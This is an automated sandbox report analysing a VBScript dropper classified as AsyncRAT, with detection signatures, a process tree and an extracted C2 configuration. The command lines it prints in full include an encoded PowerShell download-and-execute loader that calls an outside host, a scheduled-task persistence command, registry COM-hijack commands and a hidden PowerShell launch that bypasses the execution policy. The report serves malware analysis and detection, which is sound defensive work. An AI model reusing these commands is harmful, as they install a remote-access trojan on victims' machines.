Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
H#0813-186765.vbs

Overview

General Information

Sample name:H#0813-186765.vbs
Analysis ID:1532152
MD5:1ad458edaf24cc5d33db3978b18d446c
SHA1:3ee17340104e4ac3d95c96b35bbe32a3f0c0f56a
SHA256:42dbdf691f31f25bc8da8504d82bfeb4508d30c982ff3c56c89e98d6692a8a77
Tags:vbsuser-abuse_ch
Infos:

Detection

AsyncRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected AsyncRAT
.NET source code contains potential unpacker
AI detected suspicious sample
Bypasses PowerShell execution policy
Creates a thread in another existing process (thread injection)
Loading BitLocker PowerShell Module
Sigma detected: Potential AMSI COM Server Hijacking
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 572 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\H#0813-186765.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 4844 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $var1 = $([char]([byte]0x20)+[char]([byte]0x5b)+[char]([byte]0x52)+[char]([byte]0x65)+[char]([byte]0x66)+[char]([byte]0x6c)+[char]([byte]0x65)+[char]([byte]0x63)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x6f)+[char]([byte]0x6e)+[char]([byte]0x2e)+[char]([byte]0x41)+[char]([byte]0x73)+[char]([byte]0x73)+[char]([byte]0x65)+[char]([byte]0x6d)+[char]([byte]0x62)+[char]([byte]0x6c)+[char]([byte]0x79)+[char]([byte]0x5d)+[char]([byte]0x3a)+[char]([byte]0x3a)+[char]([byte]0x6c)+[char]([byte]0x6f)+[char]([byte]0x61)+[char]([byte]0x64)+[char]([byte]0x77)+[char]([byte]0x69)+[char]([byte]0x74)+[char]([byte]0x68)+[char]([byte]0x50)+[char]([byte]0x61)+[char]([byte]0x72)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x4e)+[char]([byte]0x61)+[char]([byte]0x6d)+[char]([byte]0x65)+[char]([byte]0x28)+[char]([byte]0x22)+[char]([byte]0x4d)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x72)+[char]([byte]0x6f)+[char]([byte]0x73)+[char]([byte]0x6f)+[char]([byte]0x66)+[char]([byte]0x74)+[char]([byte]0x2e)+[char]([byte]0x56)+[char]([byte]0x69)+[char]([byte]0x73)+[char]([byte]0x75)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x42)+[char]([byte]0x61)+[char]([byte]0x73)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x22)+[char]([byte]0x29)+[char]([byte]0x20)+[char]([byte]0x7c)+[char]([byte]0x20)+[char]([byte]0x4f)+[char]([byte]0x75)+[char]([byte]0x74)+[char]([byte]0x2d)+[char]([byte]0x4e)+[char]([byte]0x75)+[char]([byte]0x6c)+[char]([byte]0x6c)+[char]([byte]0x20)+[char]([byte]0x3b)+[char]([byte]0x73)+[char]([byte]0x6c)+[char]([byte]0x65)+[char]([byte]0x65)+[char]([byte]0x70)+[char]([byte]0x20)+[char]([byte]0x2d)+[char]([byte]0x73)+[char]([byte]0x20)+[char]([byte]0x34)+[char]([byte]0x20)+[char]([byte]0x3b)+[char]([byte]0x20)+[char]([byte]0x24)+[char]([byte]0x76)+[char]([byte]0x61)+[char]([byte]0x72)+[char]([byte]0x20)+[char]([byte]0x3d)+[char]([byte]0x20)+[char]([byte]0x20)+[char]([byte]0x5b)+[char]([byte]0x4d)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x72)+[char]([byte]0x6f)+[char]([byte]0x73)+[char]([byte]0x6f)+[char]([byte]0x66)+[char]([byte]0x74)+[char]([byte]0x2e)+[char]([byte]0x56)+[char]([byte]0x69)+[char]([byte]0x73)+[char]([byte]0x75)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x42)+[char]([byte]0x61)+[char]([byte]0x73)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x2e)+[char]([byte]0x49)+[char]([byte]0x6e)+[char]([byte]0x74)+[char]([byte]0x65)+[char]([byte]0x72)+[char]([byte]0x61)+[char]([byte]0x63)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x6f)+[char]([byte]0x6e)+[char]([byte]0x5d)+[char]([byte]0x3a)+[char]([byte]0x3a)+[char]([byte]0x43)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x6c)+[char]([byte]0x62)+[char]([byte]0x79)+[char]([byte]0x6e)+[char]([byte]0x61)+[char]([byte]0x6d)+[char]([byte]0x65)+[char]([byte]0x28)+[char]([byte]0x28)+[char]([byte]0x4e)+[char]([byte]0x65)+[char]([byte]0x77)+[char]([byte]0x2d)+[char]([byte]0x6f)+[char]([byte]0x62)+[char]([byte]0x6a)+[char]([byte]0x65)+[char]([byte]0x63)+[char]([byte]0x74)+[char]([byte]0x20)+[char]([byte]0x6e)+[char]([byte]0x65)+[char]([byte]0x74)+[char]([byte]0x2e)+[char]([byte]0x77)+[char]([byte]0x65)+[char]([byte]0x62)+[char]([byte]0x63)+[char]([byte]0x6c)+[char]([byte]0x69)+[char]([byte]0x65)+[char]([byte]0x6e)+[char]([byte]0x74)+[char]([byte]0x20)+[char]([byte]0x29)+[char]([byte]0x20)+[char]([byte]0x2c)+[char]([byte]0x20)+[char]([byte]0x22)+[char]([byte]0x44)+[char]([byte]0x6f)+[char]([byte]0x77)+[char]([byte]0x6e)+[char]([byte]0x6c)+[char]([byte]0x6f)+[char]([byte]0x61)+[char]([byte]0x64)+[char]([byte]0x53)+[char]([byte]0x74)+[char]([byte]0x72)+[char]([byte]0x69)+[char]([byte]0x6e)+[char]([byte]0x67)+[char]([byte]0x22)+[char]([byte]0x20)+[char]([byte]0x2c)+[char]([byte]0x20)+[char]([byte]0x5b)+[char]([byte]0x4d)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x72)+[char]([byte]0x6f)+[char]([byte]0x73)+[char]([byte]0x6f)+[char]([byte]0x66)+[char]([byte]0x74)+[char]([byte]0x2e)+[char]([byte]0x56)+[char]([byte]0x69)+[char]([byte]0x73)+[char]([byte]0x75)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x42)+[char]([byte]0x61)+[char]([byte]0x73)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x2e)+[char]([byte]0x43)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x6c)+[char]([byte]0x54)+[char]([byte]0x79)+[char]([byte]0x70)+[char]([byte]0x65)+[char]([byte]0x5d)+[char]([byte]0x3a)+[char]([byte]0x3a)+[char]([byte]0x4d)+[char]([byte]0x65)+[char]([byte]0x74)+[char]([byte]0x68)+[char]([byte]0x6f)+[char]([byte]0x64)+[char]([byte]0x2c)+[char]([byte]0x20)+[char]([byte]0x22)+[char]([byte]0x68)+[char]([byte]0x74)+[char]([byte]0x74)+[char]([byte]0x70)+[char]([byte]0x73)+[char]([byte]0x3a)+[char]([byte]0x2f)+[char]([byte]0x2f)+[char]([byte]0x76)+[char]([byte]0x61)+[char]([byte]0x72)+[char]([byte]0x69)+[char]([byte]0x65)+[char]([byte]0x74)+[char]([byte]0x79)+[char]([byte]0x64)+[char]([byte]0x69)+[char]([byte]0x72)+[char]([byte]0x65)+[char]([byte]0x63)+[char]([byte]0x74)+[char]([byte]0x6f)+[char]([byte]0x75)+[char]([byte]0x74)+[char]([byte]0x6c)+[char]([byte]0x65)+[char]([byte]0x74)+[char]([byte]0x2e)+[char]([byte]0x63)+[char]([byte]0x6f)+[char]([byte]0x6d)+[char]([byte]0x2f)+[char]([byte]0x72)+[char]([byte]0x65)+[char]([byte]0x64)+[char]([byte]0x72)+[char]([byte]0x6f)+[char]([byte]0x2f)+[char]([byte]0x73)+[char]([byte]0x61)+[char]([byte]0x73)+[char]([byte]0x61)+[char]([byte]0x2e)+[char]([byte]0x67)+[char]([byte]0x69)+[char]([byte]0x66)+[char]([byte]0x22)+[char]([byte]0x20)+[char]([byte]0x29)) ; $var2 = $([char]([byte]0x26)+[char]([byte]0x28)+[char]([byte]0x67)+[char]([byte]0x63)+[char]([byte]0x6d)+[char]([byte]0x20)+[char]([byte]0x69)+[char]([byte]0x2a)+[char]([byte]0x2a)+[char]([byte]0x6e)+[char]([byte]0x76)+[char]([byte]0x2a)+[char]([byte]0x2a)+[char]([byte]0x2a)+[char]([byte]0x6f)+[char]([byte]0x6b)+[char]([byte]0x65)+[char]([byte]0x2d)+[char]([byte]0x65)+[char]([byte]0x78)+[char]([byte]0x70)+[char]([byte]0x72)+[char]([byte]0x2a)+[char]([byte]0x2a)+[char]([byte]0x69)+[char]([byte]0x6f)+[char]([byte]0x6e)+[char]([byte]0x29)) ; $var3 = $var1+ ' | ' +$var2; $sb1 = [scriptblock]::Create($var3).Invoke() MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 3524 cmdline: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 2 /tn "Cloud OneDrive" /tr C:\ProgramData\Cloud\cloud.vbs MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • wscript.exe (PID: 7108 cmdline: C:\Windows\System32\WScript.exe "C:\ProgramData\Cloud\cloud.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 4308 cmdline: "C:\Windows\System32\cmd.exe" /c C:\ProgramData\Cloud\cloud.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 5248 cmdline: REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • reg.exe (PID: 5748 cmdline: REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\RedroCrypt.dll /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 572 cmdline: cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 4036 cmdline: Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • RegSvcs.exe (PID: 1524 cmdline: "C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 5564 cmdline: C:\Windows\System32\WScript.exe "C:\ProgramData\Cloud\cloud.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 1888 cmdline: "C:\Windows\System32\cmd.exe" /c C:\ProgramData\Cloud\cloud.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 5580 cmdline: REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • reg.exe (PID: 5340 cmdline: REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\RedroCrypt.dll /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 3636 cmdline: cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 2848 cmdline: Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • RegSvcs.exe (PID: 6100 cmdline: "C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
{"Server": "88.119.175.153", "Port": "6606,7707,8808,6666,5555,7777,8888,4444,9999", "Version": "AWS | 3Losh", "MutexName": "AsyncMutex_Ass#$Butt$", "Autorun": "false", "Group": "true"}
SourceRuleDescriptionAuthorStrings
dump.pcapMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
  • 0x21e402:$x1: AsyncRAT
  • 0x21e440:$x1: AsyncRAT
SourceRuleDescriptionAuthorStrings
00000016.00000002.3400803278.0000000005286000.00000004.00000020.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
  • 0x7bb:$x1: AsyncRAT
  • 0x7f9:$x1: AsyncRAT
0000000D.00000002.3429100433.0000000005B28000.00000004.00000020.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
  • 0x4a4b:$x1: AsyncRAT
  • 0x4a89:$x1: AsyncRAT
00000016.00000002.3400152760.0000000005190000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
    00000016.00000002.3383370741.0000000000B70000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
    • 0xe7ac:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
    • 0x11d0a:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
    0000000D.00000002.3418123386.0000000003431000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
      Click to see the 11 entries
      SourceRuleDescriptionAuthorStrings
      22.2.RegSvcs.exe.5190000.0.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

        System Summary

        barindex
        Source: Registry Key setAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Details: C:\RedroCrypt.dll, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 5748, TargetObject: HKEY_CURRENT_USER_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\(Default)
        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $var1 = $([char]([byte]0x20)+[char]([byte]0x5b)+[char]([byte]0x52)+[char]([byte]0x65)+[char]([byte]0x66)+[char]([byte]0x6c)+[char]([byte]0x65)+[char]([byte]0x63)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x6f)+[char]([byte]0x6e)+[char]([byte]0x2e)+[char]([byte]0x41)+[char]([byte]0x73)+[char]([byte]0x73)+[char]([byte]0x65)+[char]([byte]0x6d)+[char]([byte]0x62)+[char]([byte]0x6c)+[char]([byte]0x79)+[char]([byte]0x5d)+[char]([byte]0x3a)+[char]([byte]0x3a)+[char]([byte]0x6c)+[char]([byte]0x6f)+[char]([byte]0x61)+[char]([byte]0x64)+[char]([byte]0x77)+[char]([byte]0x69)+[char]([byte]0x74)+[char]([byte]0x68)+[char]([byte]0x50)+[char]([byte]0x61)+[char]([byte]0x72)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x4e)+[char]([byte]0x61)+[char]([byte]0x6d)+[char]([byte]0x65)+[char]([byte]0x28)+[char]([byte]0x22)+[char]([byte]0x4d)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x72)+[char]([byte]0x6f)+[char]([byte]0x73)+[char]([byte]0x6f)+[char]([byte]0x66)+[char]([byte]0x74)+[char]([byte]0x2e)+[char]([byte]0x56)+[char]([byte]0x69)+[char]([byte]0x73)+[char]([byte]0x75)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x42)+[char]([byte]0x61)+[char]([byte]0x73)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x22)+[char]([byte]0x29)+[char]([byte]0x20)+[char]([byte]0x7c)+[char]([byte]0x20)+[char]([byte]0x4f)+[char]([byte]0x75)+[char]([byte]0x74)+[char]([byte]0x2d)+[char]([byte]0x4e)+[char]([byte]0x75)+[char]([byte]0x6c)+[char]([byte]0x6c)+[char]([byte]0x20)+[char]([byte]0x3b)+[char]([byte]0x73)+[char]([byte]0x6c)+[char]([byte]0x65)+[char]([byte]0x65)+[char]([byte]0x70)+[char]([byte]0x20)+[char]([byte]0x2d)+[char]([byte]0x73)+[char]([byte]0x20)+[char]([byte]0x34)+[char]([byte]0x20)+[char]([byte]0x3b)+[char]([byte]0x20)+[char]([byte]0x24)+[char]([byte]0x76)+[char]([byte]0x61)+[char]([byte]0x72)+[char]([byte]0x20)+[char]([byte]0x3d)+[char]([byte]0x20)+[char]([byte]0x20)+[char]([byte]0x5b)+[char]([byte]0x4d)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x72)+[char]([byte]0x6f)+[char]([byte]0x73)+[char]([byte]0x6f)+[char]([byte]0x66)+[char]([byte]0x74)+[char]([byte]0x2e)+[char]([byte]0x56)+[char]([byte]0x69)+[char]([byte]0x73)+[char]([byte]0x75)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x42)+[char]([byte]0x61)+[char]([byte]0x73)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x2e)+[char]([byte]0x49)+[char]([byte]0x6e)+[char]([byte]0x74)+[char]([byte]0x65)+[char]([byte]0x72)+[char]([byte]0x61)+[char]([byte]0x63)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x6f)+[char]([byte]0x6e)+[char]([byte]0x5d)+[char]([byte]0x3a)+[char]([byte]0x3a)+[char]([byte]0x43)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x6c)+[char]([byte]0x62)+[char]([byte]0x79)+[char]([byte]0x6e)+[char]([byte]0x61)+[char]([byte]0x6d)+[char]([byte]0x65)+[char]([byte]0x28)+[char]([byte]0x28)+[char]([byte]0x4e)+[char]([byte]0x65)+[char]([
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 2 /tn "Cloud OneDrive" /tr C:\ProgramData\Cloud\cloud.vbs, CommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 2 /tn "Cloud OneDrive" /tr C:\ProgramData\Cloud\cloud.vbs, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $var1 = $([char]([byte]0x20)+[char]([byte]0x5b)+[char]([byte]0x52)+[char]([byte]0x65)+[char]([byte]0x66)+[char]([byte]0x6c)+[char]([byte]0x65)+[char]([byte]0x63)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x6f)+[char]([byte]0x6e)+[char]([byte]0x2e)+[char]([byte]0x41)+[char]([byte]0x73)+[char]([byte]0x73)+[char]([byte]0x65)+[char]([byte]0x6d)+[char]([byte]0x62)+[char]([byte]0x6c)+[char]([byte]0x79)+[char]([byte]0x5d)+[char]([byte]0x3a)+[char]([byte]0x3a)+[char]([byte]0x6c)+[char]([byte]0x6f)+[char]([byte]0x61)+[char]([byte]0x64)+[char]([byte]0x77)+[char]([byte]0x69)+[char]([byte]0x74)+[char]([byte]0x68)+[char]([byte]0x50)+[char]([byte]0x61)+[char]([byte]0x72)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x4e)+[char]([byte]0x61)+[char]([byte]0x6d)+[char]([byte]0x65)+[char]([byte]0x28)+[char]([byte]0x22)+[char]([byte]0x4d)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x72)+[char]([byte]0x6f)+[char]([byte]0x73)+[char]([byte]0x6f)+[char]([byte]0x66)+[char]([byte]0x74)+[char]([byte]0x2e)+[char]([byte]0x56)+[char]([byte]0x69)+[char]([byte]0x73)+[char]([byte]0x75)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x42)+[char]([byte]0x61)+[char]([byte]0x73)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x22)+[char]([byte]0x29)+[char]([byte]0x20)+[char]([byte]0x7c)+[char]([byte]0x20)+[char]([byte]0x4f)+[char]([byte]0x75)+[char]([byte]0x74)+[char]([byte]0x2d)+[char]([byte]0x4e)+[char]([byte]0x75)+[char]([byte]0x6c)+[char]([byte]0x6c)+[char]([byte]0x20)+[char]([byte]0x3b)+[char]([byte]0x73)+[char]([byte]0x6c)+[char]([byte]0x65)+[char]([byte]0x65)+[char]([byte]0x70)+[char]([byte]0x20)+[char]([byte]0x2d)+[char]([byte]0x73)+[char]([byte]0x20)+[char]([byte]0x34)+[char]([byte]0x20)+[char]([byte]0x3b)+[char]([byte]0x20)+[char]([byte]0x24)+[char]([byte]0x76)+[char]([byte]0x61)+[char]([byte]0x72)+[char]([byte]0x20)+[char]([byte]0x3d)+[char]([byte]0x20)+[char]([byte]0x20)+[char]([byte]0x5b)+[char]([byte]0x4d)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x72)+[char]([byte]0x6f)+[char]([byte]0x73)+[char]([byte]0x6f)+[char]([byte]0x66)+[char]([byte]0x74)+[char]([byte]0x2e)+[char]([byte]0x56)+[char]([byte]0x69)+[char]([byte]0x73)+[char]([byte]0x75)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x42)+[char]([byte]0x61)+[char]([byte]0x73)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x2e)+[char]([byte]0x49)+[char]([byte]0x6e)+[char]([byte]0x74)+[char]([byte]0x65)+[char]([byte]
        Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4844, TargetFilename: C:\ProgramData\Cloud\cloud.bat
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1" , CommandLine: Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1" , CommandLine|base64offset|contains: >^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 572, ParentProcessName: cmd.exe, ProcessCommandLine: Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1" , ProcessId: 4036, ProcessName: powershell.exe
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\H#0813-186765.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\H#0813-186765.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\H#0813-186765.vbs", ProcessId: 572, ProcessName: wscript.exe
        Source: Process startedAuthor: frack113: Data: Command: Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1" , CommandLine: Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1" , CommandLine|base64offset|contains: >^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 572, ParentProcessName: cmd.exe, ProcessCommandLine: Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1" , ProcessId: 4036, ProcessName: powershell.exe
        Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4844, TargetFilename: C:\ProgramData\Cloud\cloud.vbs
        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\H#0813-186765.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\H#0813-186765.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\H#0813-186765.vbs", ProcessId: 572, ProcessName: wscript.exe
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $var1 = $([char]([byte]0x20)+[char]([byte]0x5b)+[char]([byte]0x52)+[char]([byte]0x65)+[char]([byte]0x66)+[char]([byte]0x6c)+[char]([byte]0x65)+[char]([byte]0x63)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x6f)+[char]([byte]0x6e)+[char]([byte]0x2e)+[char]([byte]0x41)+[char]([byte]0x73)+[char]([byte]0x73)+[char]([byte]0x65)+[char]([byte]0x6d)+[char]([byte]0x62)+[char]([byte]0x6c)+[char]([byte]0x79)+[char]([byte]0x5d)+[char]([byte]0x3a)+[char]([byte]0x3a)+[char]([byte]0x6c)+[char]([byte]0x6f)+[char]([byte]0x61)+[char]([byte]0x64)+[char]([byte]0x77)+[char]([byte]0x69)+[char]([byte]0x74)+[char]([byte]0x68)+[char]([byte]0x50)+[char]([byte]0x61)+[char]([byte]0x72)+[char]([byte]0x74)+[char]([byte]0x69)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x4e)+[char]([byte]0x61)+[char]([byte]0x6d)+[char]([byte]0x65)+[char]([byte]0x28)+[char]([byte]0x22)+[char]([byte]0x4d)+[char]([byte]0x69)+[char]([byte]0x63)+[char]([byte]0x72)+[char]([byte]0x6f)+[char]([byte]0x73)+[char]([byte]0x6f)+[char]([byte]0x66)+[char]([byte]0x74)+[char]([byte]0x2e)+[char]([byte]0x56)+[char]([byte]0x69)+[char]([byte]0x73)+[char]([byte]0x75)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x42)+[c